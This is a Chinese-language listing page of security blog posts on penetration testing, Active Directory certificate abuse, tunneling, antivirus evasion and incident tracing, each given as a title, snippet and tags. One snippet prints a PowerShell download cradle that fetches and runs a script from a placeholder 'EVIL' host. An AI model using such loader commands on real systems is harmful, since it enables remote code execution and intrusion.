ADCS攻击笔记 前言本篇文章主要是对《Certified Pre-Owned: Abusing Active Directory Certificate Services》（链接文章末尾）中提到ESC1&ESC8和最... 2023-5-5 08:2:48 | 阅读: 19 | 收藏 | 橘猫学安全 证书 adcs dc2012 漏洞 certipy

反向Frp+正向Iox搭建代理链 01 背景拥有2-3台主机权限,两台机器处于不同的网段且有隔离，通过使用第一台主机建立反向隧道，第二台机器建立正向隧道，打通多层网络。了解常用的建立正反向隧道及代理链的方法，熟练在内网中借助隧道移动。... 2023-5-5 08:2:44 | 阅读: 22 | 收藏 | 橘猫学安全 隧道 代理 爆破 网络 渗透

薪酬6连涨！网络安全的天花板在哪里? 这几年随着我国《国家网络空间安全战略》《网络安全法》《网络安全等级保护2.0》等一系列政策/法规/标准的持续落地，网络安全行业地位、薪资随之水涨船高。据9月6日发布的《网络安全人才实战能力白皮书》显示... 2023-5-5 08:2:41 | 阅读: 20 | 收藏 | 橘猫学安全 安全 网络 渗透 攻防

常用的30+种未授权访问漏洞汇总 本文仅限技术研究与讨论，严禁用于非法用途，否则产生的一切后果自行承担本文导读：尽量覆盖了目前网络资讯上公布的30+种未授权访问漏洞融入了本人的学习经验和心得，把未授权访问漏洞按照默认端口顺序从小到大排... 2023-5-4 00:3:33 | 阅读: 46 | 收藏 | 橘猫学安全 漏洞 端口 swagger 修复 数据

开源信息收集工具推荐 InfoG是一个用于收集目标信息的Shell脚本。可以在渗透测试的初始阶段收集信息。InfoG功能查看网站信息查看电话信息IP追踪器检查有效的电子邮件检查站点是否为Up / Down检查网速查看个人信... 2023-5-4 00:3:29 | 阅读: 27 | 收藏 | 橘猫学安全 信息 infog 渗透 爆破 端口

有手就行 | Log4j打点后与管理员斗智斗勇 这是本系列第三篇文章，依旧是某省HVV红队的经历。过程中只用到很简单的方法，所以加了个标题“有手就行”。这家企业在内网犯了几乎所有能犯的错误，打起来也比较顺利，只不过当时被管理员发现了，争分夺秒的过程... 2023-5-3 00:2:1 | 阅读: 41 | 收藏 | 橘猫学安全 爆破 数据 渗透 漏洞 代理

一款集合多功能的桌面安全工具 一、介绍及项目地址：雪影，一款桌面软件，集成了IP查询，端口扫描，系统命令，Webshell，C段存活扫描，后台目录扫描，远程控制等功能，以后还会增加其它实用功能。项目地址：https://githu... 2023-5-3 00:1:57 | 阅读: 35 | 收藏 | 橘猫学安全 远程 控制 端口 渗透 编解码

挖到这个高危SSRF漏洞，小伙伴们都惊呆了！ 前言在某次金融类众测项目中，笔者发现了一个几乎无从下手的系统，直接访问系统无任何功能，几乎相当于404 Not Found，甚至连JavaScript文件一个都不存在，最终通过渗透经验和一定的运气，拿... 2023-5-2 08:3:3 | 阅读: 102 | 收藏 | 橘猫学安全 漏洞 信息 渗透 爆破 403

好用的分布式web漏洞扫描平台 随着互联网各种安全漏洞愈演愈烈，JAVA反序列化漏洞、STRUTS命令执行漏洞、ImageMagick命令执行漏洞等高危漏洞频繁爆发。在这种情况下，为了能在漏洞爆发后快速形成漏洞检测能力，同时能对网站... 2023-5-2 08:2:56 | 阅读: 17 | 收藏 | 橘猫学安全 漏洞 wdscanner 安全 爆破 渗透

mimikatz和shellcode免杀 前置知识1.Windows apiVirtualProtectBOOL VirtualProtect( [in] LPVOID lpAddress,//要更改属性的地址 [in] SIZE_T... 2023-5-1 00:2:3 | 阅读: 30 | 收藏 | 橘猫学安全 winhttp hrequest proxy dwsize hinternet

高效的资产收集工具 -- Kunyu 一、工具介绍Kunyu (坤舆)，名字取自 <坤舆万国全图> ，测绘实际上是一个地理信息相关的专业学科，针对海里的、陆地的、天上的地理信息进行盘点。同样应用于网络空间，发现未知、脆弱的资产也是如此，更... 2023-5-1 00:1:57 | 阅读: 23 | 收藏 | 橘猫学安全 网络 坤舆 爆破 渗透

一些有趣的powershell加载命令 普通下载IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")PowerShell 3.0+IEX (iwr 'ht... 2023-4-30 00:10:43 | 阅读: 40 | 收藏 | 橘猫学安全 渗透 爆破 xmlhttp comobject

SRC混子的漏洞挖掘之道 一个SRC混子挖SRC的半年经验分享~,基本都是文字阐述，希望能给同样在挖洞的师傅们带来一点新收获。前期信息收集还是那句老话,渗透测试的本质是信息收集，对于没有0day的弱鸡选手来说，挖SRC感觉更像... 2023-4-30 00:10:37 | 阅读: 29 | 收藏 | 橘猫学安全 漏洞 信息 github 绕过 子公司

实战 | CE修改微信小游戏 一、CE 修改模拟器上运行的微信小游戏修改完以后数据立马变为 400二、CE 修改 PC 微信上运行的小程序三、被反编译和重打包通过对上面的.wxapkg 的包体进行反编译可以得到这个游戏的整个源码工... 2023-4-29 00:1:58 | 阅读: 68 | 收藏 | 橘猫学安全 小游戏 爆破 渗透 金币 利器

安全人员必备！Linux 远程数据同步工具详解 一、简介1 认识Rsync（remote synchronize）是一个远程数据同步工具，可通过LAN/WAN快速同步多台主机间的文件。Rsync使用所谓的“Rsync算法”来使本地和远 程两个主机之... 2023-4-28 00:4:43 | 阅读: 14 | 收藏 | 橘猫学安全 rsync 模块 george web1 xinetd

校园网认证系统安全测试（绕过） 文章来源：CSDN博客（起的早的虫被鸟吃），原文地址：https://blog.csdn.net/weixin_50354568/article/details/108602877本次测试采用本地搭建... 2023-4-28 00:4:39 | 阅读: 69 | 收藏 | 橘猫学安全 校园 校园网 数据 burp 渗透

一次持续的邮件钓鱼攻击的简单溯源分析，看看是谁在钓鱼？ 一、基本情况昨天连续收到两封欺骗邮件，分别是凌晨和下午，邮件的主题、内容都是一样的，主要 是发送人的信息不同，两份邮件截图如下所示：第一封：第二封：邮件内容中，欺骗用户连接的URL地址也是一样的，都是... 2023-4-27 00:1:33 | 阅读: 57 | 收藏 | 橘猫学安全 cn2022 攻击 攻击者 信息

推荐-强大的日志分析软件 0x01 AWStats介绍在日常web服务器的运行中，记录了大量的客户机访问的信息，而如何快捷地知道此刻web服务器的访问及运行情况，如每天的访问IP数量、点击量最大的页面、每日的访问高峰时间段等信... 2023-4-27 00:1:30 | 阅读: 20 | 收藏 | 橘猫学安全 awstats 信息 渗透 爆破 sourceforge

Windows服务器中挖矿病毒排查指南 Windows服务器中挖矿病毒排查指南注释：本文章适用于Windows服务器中挖矿病毒排查文章背景：服务器运行中发现程序启动很慢，打开任务管理器，发现cpu被占用接近100%，服务器资源占用严重。排查... 2023-4-26 00:2:1 | 阅读: 19 | 收藏 | 橘猫学安全 windows 杀毒 安全 software microsoft

渗透技巧 | 遇到网站数据包加密传输的解决方法 前言在渗透过程中，有时候会遇到一些站请求包和响应包都是加密的，这样的话完全无法查看数据提交结构以及进行渗透测试。前端寻找加密方式加密参数是 parameter 我们只需要将网页另存为，然后全局搜索所有... 2023-4-26 00:1:58 | 阅读: 32 | 收藏 | 橘猫学安全 加密 渗透 sqlmap python cryptojs